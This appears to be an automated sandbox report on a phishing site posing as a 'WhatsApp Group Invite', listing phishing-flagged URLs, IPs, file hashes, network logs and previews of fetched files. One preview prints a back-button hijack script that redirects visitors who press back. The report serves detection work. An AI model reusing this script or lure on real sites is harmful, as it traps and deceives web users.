            https://a.nel.cloudflare.com/report/v4?s=UKLXXHvuekcQ4aoLacKwPYzxX6wUZH5iwB%2Fm325F2Fs5Op0K4cpKAoY0QWUY2Zi%2FiTMBHNAV41jBVCGvFGsHFYBrtWDRvL%2FeQ760zM4q6HvnPTbnTa10pIecUpgvq1rCDIGQfalse
            • Avira URL Cloud: safe
            unknown
            https://dfsvgd.pages.dev/img/logo-2.jpgtrue
            • Avira URL Cloud: phishing
            unknown
            https://dfsvgd.pages.dev/true
              unknown
              https://dfsvgd.pages.dev/npm/backoffer.jstrue
              • Avira URL Cloud: phishing
              unknown
              https://dfsvgd.pages.dev/npm/bootstrap-icons-1.8.1/font/bootstrap-icons.csstrue
              • Avira URL Cloud: phishing
              unknown
              https://a.nel.cloudflare.com/report/v4?s=8pv5SLQdY1NtE7pPoLC0eSnYf1MZgid%2BYcQl3WAwKxM7JAkXRPw4O4DNt%2B0O%2FOOoA0xg1FYw0mlQ0Rx9Q7qvnkXOJoXRnqpTWMxHGD2FMsnKU4zGokRK0CI06PgFRUrCFzn0false
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_55.2.drfalse
              • Avira URL Cloud: safe
              unknown
              https://getbootstrap.com/)chromecache_55.2.drfalse
              • URL Reputation: safe
              unknown
              https://smxtrack.com/tracking202/redirect/rtr.php?t202id=214&c1=RJ_ETH&t202kw=RJ_ETHchromecache_53.2.drfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              103.253.215.19
              smxtrack.comIndonesia
              58487RUMAHWEB-AS-IDRumahwebIndonesiaCVIDfalse
              172.240.108.68
              hzr0dm28m17c.comUnited States
              7979SERVERS-COMUSfalse
              239.255.255.250
              unknownReserved
              unknownunknownfalse
              188.114.96.3
              dfsvgd.pages.devEuropean Union
              13335CLOUDFLARENETUSfalse
              35.190.80.1
              a.nel.cloudflare.comUnited States
              15169GOOGLEUSfalse
              172.217.16.132
              www.google.comUnited States
              15169GOOGLEUSfalse
              IP
              192.168.2.8
              192.168.2.7
              192.168.2.4
              192.168.2.5
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1501500
              Start date and time:2024-08-30 00:46:31 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 3m 50s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:browseurl.jbs
              Sample URL:http://dfsvgd.pages.dev/
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal60.phis.win@23/17@19/10
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Browse: https://smxtrack.com/tracking202/redirect/rtr.php?t202id=214&c1=RJ_ETH&t202kw=RJ_ETH
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 142.250.185.195, 74.125.71.84, 142.250.186.46, 34.104.35.123, 199.232.210.172, 192.229.221.95, 142.250.184.227, 216.58.206.78
              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtSetInformationFile calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: http://dfsvgd.pages.dev/
              No simulations
              No context
              No context
              No context
              No context
              No context
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with CRLF line terminators
              Category:downloaded
              Size (bytes):618
              Entropy (8bit):4.570271674086341
              Encrypted:false
              SSDEEP:6:2LGbR5W/FI8JWWvn1FKCzW96FoGtAIAGoeZRJjRoV5RNeW/F3cykkW/FSRU1F5Rr:2gvWyY8nkJtoV8WjWMOoVyCQWD7BJ6Z
              MD5:4E39716B4D4469996FC6E68265FA8830
              SHA1:C8B24994E71F4E58170E639124107FD25757F755
              SHA-256:3CC4CDC7B3421264503656474F5B10DB20BC711493BFE2DF0680DA0B7C81A72C
              SHA-512:D4A36047ABFC705C874CF2873E8A65C60A2879D6B9DEC8807A55CE882BEBC7D25A20788C4D67D69B15B4E82351A79E0E0BCB053B93126526FB4A7D9EC99BEBB5
              Malicious:false
              Reputation:low
              URL:https://dfsvgd.pages.dev/npm/backoffer.js
              Preview:(function(w,d){.. var targetLocation=function(){.. var url='';.. if(w.backOfferUrl){.. url=w.backOfferUrl}.. else{.. return}.. w.history&&w.history.pushState&&w.history.pushState(null,null,w.location);.. w.addEventListener&&w.addEventListener('popstate',function(){.. w.location=url}.. ,!1)};.. (function(){.. if(w.addEventListener){.. w.addEventListener('pageshow',function(){.. setTimeout(targetLocation,0)}.. ,!1)}.. else{.. setTimeout(targetLocation,0)}.. }.. ())}.. (window,document));..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):618
              Entropy (8bit):4.570271674086341
              Encrypted:false
              SSDEEP:6:2LGbR5W/FI8JWWvn1FKCzW96FoGtAIAGoeZRJjRoV5RNeW/F3cykkW/FSRU1F5Rr:2gvWyY8nkJtoV8WjWMOoVyCQWD7BJ6Z
              MD5:4E39716B4D4469996FC6E68265FA8830
              SHA1:C8B24994E71F4E58170E639124107FD25757F755
              SHA-256:3CC4CDC7B3421264503656474F5B10DB20BC711493BFE2DF0680DA0B7C81A72C
              SHA-512:D4A36047ABFC705C874CF2873E8A65C60A2879D6B9DEC8807A55CE882BEBC7D25A20788C4D67D69B15B4E82351A79E0E0BCB053B93126526FB4A7D9EC99BEBB5
              Malicious:false
              Reputation:low
              Preview:(function(w,d){.. var targetLocation=function(){.. var url='';.. if(w.backOfferUrl){.. url=w.backOfferUrl}.. else{.. return}.. w.history&&w.history.pushState&&w.history.pushState(null,null,w.location);.. w.addEventListener&&w.addEventListener('popstate',function(){.. w.location=url}.. ,!1)};.. (function(){.. if(w.addEventListener){.. w.addEventListener('pageshow',function(){.. setTimeout(targetLocation,0)}.. ,!1)}.. else{.. setTimeout(targetLocation,0)}.. }.. ())}.. (window,document));..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (5229), with CRLF line terminators
              Category:downloaded
              Size (bytes):9665
              Entropy (8bit):5.442350004021012
              Encrypted:false
              SSDEEP:192:4nrKm/ytWV335Ak9XJ6dw/0Yv8kPaxaMu:4nEtWVCkx0w/pvbPaAMu
              MD5:4C60349B6C4903A63EFCE07108AB3157
              SHA1:ECB810800EFD9D9391B8740567B4ECF4479321B3
              SHA-256:1DE1B9395457E51CEBC27C059851E33B89050C0DDBB7A4D2B10215263C4C2A3C
              SHA-512:F4C55856AD6F533B55F88D237CC5626C68D03CDB50932E7AC90ED1011B51DF475CE75D74506845B50B47A30C8C6D03FE858A5FC90E8D4774DAFF3C013B11BC06
              Malicious:false
              Reputation:low
              URL:https://dfsvgd.pages.dev/
              Preview:<!doctype html>..<html lang="en">.. <head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>.. Required meta tags -->.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <title>WhatsApp Group Invite</title>.. Bootstrap CSS -->.. <link rel="stylesheet" href="npm/bootstrap-icons-1.8.1/font/bootstrap-icons.css">.. <link href="npm/bootstrap-5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" >.. <script src="npm/backoffer.js"></script>.. <style>.. .bt {.. margin-top: 3rem;.. }.. .bt div h4 {.. margin-top: 1rem;.. font-weight: 400;.. }.. .bt div p {.. margin-bottom: 2rem;.. color: rgb(117, 117, 117);.. }.. .body {.. background-color: #4f9e00;.. }.. .bt div .tombol {.. background: #01e675;.. color: rgb(255, 255, 255);.. font-size: 14px;.. font-weight
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1080, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=720], baseline, precision 8, 720x1080, components 3
              Category:downloaded
              Size (bytes):81832
              Entropy (8bit):7.871044443541556
              Encrypted:false
              SSDEEP:1536:Ennn8OGRv/1UE0r/DhEapExzllyShTnEviHZp/hfJWw4+3kwuYpHr:enpGRvKfr/NfwhoETnhJWwt3N9
              MD5:B23FF4A6B729BC60A4D4257570AFDD8C
              SHA1:582318A27D89AD405B7CA31665ECC82749616F2A
              SHA-256:12DA446D069B3375E1171A31A8E09AF90FFB085C949B19A4CC6251314F2466A6
              SHA-512:F339804703B74FADD334B5AA96EE30F9FAFAA5823F757FA6E1AAF9E4772E5750B85C9FF70E0942D9A661B1606A5ECB1EC00102426B9C6645726ECF6E7047BDC6
              Malicious:false
              Reputation:low
              URL:https://dfsvgd.pages.dev/img/logo-2.jpg
              Preview:......Exif..MM.*...........................8...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop 24.2 (Windows).2023:06:13 00:12:55............0231..................................8...............................n...........v.(.....................~...................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................k.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...?_...Q.Oa.V.v/.S......+.....1..?...N.....?...?.....8....UW.-H.d..?S.h.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):77402
              Entropy (8bit):4.778466663248456
              Encrypted:false
              SSDEEP:768:Uqnm8OAL1Mzocm4KyH2CuwZwmij34k4RDl8Ib2:JOocm4FuwZ5ijINRDla
              MD5:B8DCFB805F1F56C8BBF8AE5F505F60DD
              SHA1:F8016E6C85663F91435EC5CE864252F197BC1C45
              SHA-256:AFB7CBE8463D17C4A11077886B18F281D54417B69E2BA85D65BB7436DC801ABF
              SHA-512:8E896E784DEE61EA5AAD8D31654230F51E2E6905AD3EEA2DE95BF8E477C4329C9033664CAE4D688CBD1BAF1B404AE5C83CC1994B7C24B859E0A41C3A78EF4CF9
              Malicious:false
              Reputation:low
              URL:https://dfsvgd.pages.dev/npm/bootstrap-icons-1.8.1/font/bootstrap-icons.css
              Preview:@font-face {. font-family: "bootstrap-icons";. src: url("fonts/bootstrap-icons.woff") format("woff2"),.url("fonts/bootstrap-icons.woff") format("woff");.}...bi::before,.[class^="bi-"]::before,.[class*=" bi-"]::before {. display: inline-block;. font-family: bootstrap-icons !important;. font-style: normal;. font-weight: normal !important;. font-variant: normal;. text-transform: none;. line-height: 1;. vertical-align: -.125em;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}...bi-123::before { content: "\f67f"; }..bi-alarm-fill::before { content: "\f101"; }..bi-alarm::before { content: "\f102"; }..bi-align-bottom::before { content: "\f103"; }..bi-align-center::before { content: "\f104"; }..bi-align-end::before { content: "\f105"; }..bi-align-middle::before { content: "\f106"; }..bi-align-start::before { content: "\f107"; }..bi-align-top::before { content: "\f108"; }..bi-alt::before { content: "\f109"; }..bi-app-indicator::before { content: "\f10a";
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:SVG Scalable Vector Graphics image
              Category:downloaded
              Size (bytes):2648
              Entropy (8bit):5.204038174539072
              Encrypted:false
              SSDEEP:48:KwUxULOO/uJ0yvi17hSlLYcoJDHVSKF6/Ykn2PFMiZgVTYnidH9EtmC0H9gMsYcs:KwUx3TJ0yaSGfDHVoWDZ0dIB0C+
              MD5:6B3EE5E3877CC19D1154CBE98EEA6F66
              SHA1:56D4B7556CEBAD6129EBB61A980D5964BE476B4A
              SHA-256:533EF6670E3D9C0E44718D0AFA43F2EDDA11B58586E9DA4E8F621145CF84D4D2
              SHA-512:B7F80F17EAA3F33A16A6A1ACCDB1C6125DCA281E639092A077D18C2AE471044C5BEEFEA41420E95A7C0882A72EFFE2C22F7A2CE29FBB1C2A3649FD91CD6C0713
              Malicious:false
              Reputation:low
              URL:https://dfsvgd.pages.dev/img/wa-logo.svg
              Preview:<svg width="37" height="36" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path d="M2.677 34.14l2.303-8.394a16.177 16.177 0 01-2.166-8.087c0-8.923 7.268-16.192 16.191-16.192 4.334 0 8.394 1.69 11.465 4.743a16.109 16.109 0 014.744 11.449c0 8.923-7.269 16.191-16.192 16.191-2.713 0-5.374-.682-7.746-1.979l-8.599 2.27z" fill="url(#paint0_linear_whatsapp_mobile_logo)"/><path fill="url(#pattern0)" d="M.92 0h36v36h-36z"/><path d="M2.097 34.72l2.389-8.684a16.736 16.736 0 01-2.236-8.377C2.233 8.394 9.758.87 19.005.87c4.487 0 8.701 1.74 11.875 4.914a16.673 16.673 0 014.914 11.875c0 9.247-7.525 16.771-16.772 16.771-2.815 0-5.562-.7-8.019-2.047L2.097 34.72zm9.299-5.357l.511.307a13.955 13.955 0 007.098 1.945c7.678 0 13.94-6.261 13.94-13.94 0-3.719-1.45-7.233-4.078-9.86a13.89 13.89 0 00-9.862-4.096c-7.695 0-13.956 6.262-13.956 13.94 0 2.627.733 5.204 2.132 7.422l.324.529-1.416 5.152 5.306-1.399z" fill="url(#paint1_linear_whatsapp_mobile_logo)"/><path fill="
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:SVG Scalable Vector Graphics image
              Category:dropped
              Size (bytes):2648
              Entropy (8bit):5.204038174539072
              Encrypted:false
              SSDEEP:48:KwUxULOO/uJ0yvi17hSlLYcoJDHVSKF6/Ykn2PFMiZgVTYnidH9EtmC0H9gMsYcs:KwUx3TJ0yaSGfDHVoWDZ0dIB0C+
              MD5:6B3EE5E3877CC19D1154CBE98EEA6F66
              SHA1:56D4B7556CEBAD6129EBB61A980D5964BE476B4A
              SHA-256:533EF6670E3D9C0E44718D0AFA43F2EDDA11B58586E9DA4E8F621145CF84D4D2
              SHA-512:B7F80F17EAA3F33A16A6A1ACCDB1C6125DCA281E639092A077D18C2AE471044C5BEEFEA41420E95A7C0882A72EFFE2C22F7A2CE29FBB1C2A3649FD91CD6C0713
              Malicious:false
              Reputation:low
              Preview:<svg width="37" height="36" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path d="M2.677 34.14l2.303-8.394a16.177 16.177 0 01-2.166-8.087c0-8.923 7.268-16.192 16.191-16.192 4.334 0 8.394 1.69 11.465 4.743a16.109 16.109 0 014.744 11.449c0 8.923-7.269 16.191-16.192 16.191-2.713 0-5.374-.682-7.746-1.979l-8.599 2.27z" fill="url(#paint0_linear_whatsapp_mobile_logo)"/><path fill="url(#pattern0)" d="M.92 0h36v36h-36z"/><path d="M2.097 34.72l2.389-8.684a16.736 16.736 0 01-2.236-8.377C2.233 8.394 9.758.87 19.005.87c4.487 0 8.701 1.74 11.875 4.914a16.673 16.673 0 014.914 11.875c0 9.247-7.525 16.771-16.772 16.771-2.815 0-5.562-.7-8.019-2.047L2.097 34.72zm9.299-5.357l.511.307a13.955 13.955 0 007.098 1.945c7.678 0 13.94-6.261 13.94-13.94 0-3.719-1.45-7.233-4.078-9.86a13.89 13.89 0 00-9.862-4.096c-7.695 0-13.956 6.262-13.956 13.94 0 2.627.733 5.204 2.132 7.422l.324.529-1.416 5.152 5.306-1.399z" fill="url(#paint1_linear_whatsapp_mobile_logo)"/><path fill="
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (5229), with CRLF line terminators
              Category:downloaded
              Size (bytes):9665
              Entropy (8bit):5.442350004021012
              Encrypted:false
              SSDEEP:192:4nrKm/ytWV335Ak9XJ6dw/0Yv8kPaxaMu:4nEtWVCkx0w/pvbPaAMu
              MD5:4C60349B6C4903A63EFCE07108AB3157
              SHA1:ECB810800EFD9D9391B8740567B4ECF4479321B3
              SHA-256:1DE1B9395457E51CEBC27C059851E33B89050C0DDBB7A4D2B10215263C4C2A3C
              SHA-512:F4C55856AD6F533B55F88D237CC5626C68D03CDB50932E7AC90ED1011B51DF475CE75D74506845B50B47A30C8C6D03FE858A5FC90E8D4774DAFF3C013B11BC06
              Malicious:false
              Reputation:low
              URL:https://dfsvgd.pages.dev/favicon.ico
              Preview:<!doctype html>..<html lang="en">.. <head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>.. Required meta tags -->.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <title>WhatsApp Group Invite</title>.. Bootstrap CSS -->.. <link rel="stylesheet" href="npm/bootstrap-icons-1.8.1/font/bootstrap-icons.css">.. <link href="npm/bootstrap-5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" >.. <script src="npm/backoffer.js"></script>.. <style>.. .bt {.. margin-top: 3rem;.. }.. .bt div h4 {.. margin-top: 1rem;.. font-weight: 400;.. }.. .bt div p {.. margin-bottom: 2rem;.. color: rgb(117, 117, 117);.. }.. .body {.. background-color: #4f9e00;.. }.. .bt div .tombol {.. background: #01e675;.. color: rgb(255, 255, 255);.. font-size: 14px;.. font-weight
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (5229), with CRLF line terminators
              Category:dropped
              Size (bytes):9665
              Entropy (8bit):5.442350004021012
              Encrypted:false
              SSDEEP:192:4nrKm/ytWV335Ak9XJ6dw/0Yv8kPaxaMu:4nEtWVCkx0w/pvbPaAMu
              MD5:4C60349B6C4903A63EFCE07108AB3157
              SHA1:ECB810800EFD9D9391B8740567B4ECF4479321B3
              SHA-256:1DE1B9395457E51CEBC27C059851E33B89050C0DDBB7A4D2B10215263C4C2A3C
              SHA-512:F4C55856AD6F533B55F88D237CC5626C68D03CDB50932E7AC90ED1011B51DF475CE75D74506845B50B47A30C8C6D03FE858A5FC90E8D4774DAFF3C013B11BC06
              Malicious:false
              Reputation:low
              Preview:<!doctype html>..<html lang="en">.. <head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>.. Required meta tags -->.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <title>WhatsApp Group Invite</title>.. Bootstrap CSS -->.. <link rel="stylesheet" href="npm/bootstrap-icons-1.8.1/font/bootstrap-icons.css">.. <link href="npm/bootstrap-5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" >.. <script src="npm/backoffer.js"></script>.. <style>.. .bt {.. margin-top: 3rem;.. }.. .bt div h4 {.. margin-top: 1rem;.. font-weight: 400;.. }.. .bt div p {.. margin-bottom: 2rem;.. color: rgb(117, 117, 117);.. }.. .body {.. background-color: #4f9e00;.. }.. .bt div .tombol {.. background: #01e675;.. color: rgb(255, 255, 255);.. font-size: 14px;.. font-weight
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Unicode text, UTF-8 text, with very long lines (61349), with CRLF line terminators
              Category:downloaded
              Size (bytes):81628
              Entropy (8bit):5.162462993405218
              Encrypted:false
              SSDEEP:768:uvenlptodygt0a3V7Nh8if0W8DsEBpy0cuJBPzI:At04T8if0W8DsEBpy0cuJB0
              MD5:B0934885F5EE0BF7BB4E9D701C4E14BD
              SHA1:EAD44ECAC88B62FF606B399F61560C9C2CCEEF3A
              SHA-256:29B87F7A2456941B2605D79964EAA7BD0F7E01448C9D0E238F4F0E3BACA6A9FF
              SHA-512:346C35C896C90F414EEA707D168D0EBD60B112F47E10109FCA8807DE757A23148B04C356A0263F86438D8225F7351E36C2971828C254FA07566427DAD0A0F40F
              Malicious:false
              Reputation:low
              URL:https://dfsvgd.pages.dev/npm/bootstrap-5.1.3/dist/css/bootstrap.min.css
              Preview:@charset "UTF-8";/*!.. * Bootstrap v5.1.3 (https://getbootstrap.com/).. * Copyright 2011-2021 The Bootstrap Authors.. * Copyright 2011-2021 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:2
              No static file info
              TimestampSource PortDest PortSource IPDest IP
              Aug 30, 2024 00:47:25.527404070 CEST49675443192.168.2.4173.222.162.32
              Aug 30, 2024 00:47:29.241141081 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.241164923 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.241241932 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.241426945 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.241436005 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.707897902 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.756072998 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.804075956 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.804090023 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.805346966 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.805406094 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.814423084 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.814512968 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.814754009 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.814759970 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.855928898 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.956701994 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.956749916 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.956784010 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.956790924 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.956801891 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.956834078 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.956846952 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.957153082 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.957192898 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.957197905 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.957581043 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.957617998 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:29.957622051 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.957676888 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:29.957720041 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.237659931 CEST49735443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.237688065 CEST44349735188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.242886066 CEST49737443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.242923975 CEST44349737188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.242990971 CEST49737443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.243441105 CEST49737443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.243453026 CEST44349737188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.244817972 CEST49738443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.244826078 CEST44349738188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.244901896 CEST49738443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.245336056 CEST49738443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.245347023 CEST44349738188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.245939016 CEST49739443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.245965004 CEST44349739188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.246021032 CEST49739443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.246376991 CEST49739443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.246388912 CEST44349739188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.249519110 CEST49740443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.249531031 CEST44349740188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.249579906 CEST49740443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.250174999 CEST49740443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.250185966 CEST44349740188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.709608078 CEST44349740188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.709645987 CEST44349737188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.715735912 CEST44349739188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.716701031 CEST49737443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.716726065 CEST44349737188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.717112064 CEST44349737188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.718435049 CEST44349738188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.723248959 CEST49740443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.723258018 CEST44349740188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.723437071 CEST49739443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.723453999 CEST44349739188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.723664999 CEST49738443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.723673105 CEST44349738188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.724062920 CEST44349738188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.724406958 CEST49737443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.724423885 CEST44349740188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.724468946 CEST49740443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.724502087 CEST44349737188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.724591970 CEST44349739188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.724636078 CEST49739443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.724795103 CEST49738443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.724867105 CEST44349738188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.725123882 CEST49740443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.725203991 CEST44349740188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.725620985 CEST49739443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.725688934 CEST44349739188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.725842953 CEST49737443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.725970984 CEST49738443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.726033926 CEST49740443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.726041079 CEST44349740188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.726145029 CEST49739443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.726151943 CEST44349739188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.768497944 CEST44349737188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.768506050 CEST44349738188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.771958113 CEST49740443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.777201891 CEST49739443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.861450911 CEST44349740188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.861547947 CEST44349740188.114.96.3192.168.2.4
              Aug 30, 2024 00:47:30.861593962 CEST49740443192.168.2.4188.114.96.3
              Aug 30, 2024 00:47:30.876099110 CEST44349739188.114.96.3192.168.2.4
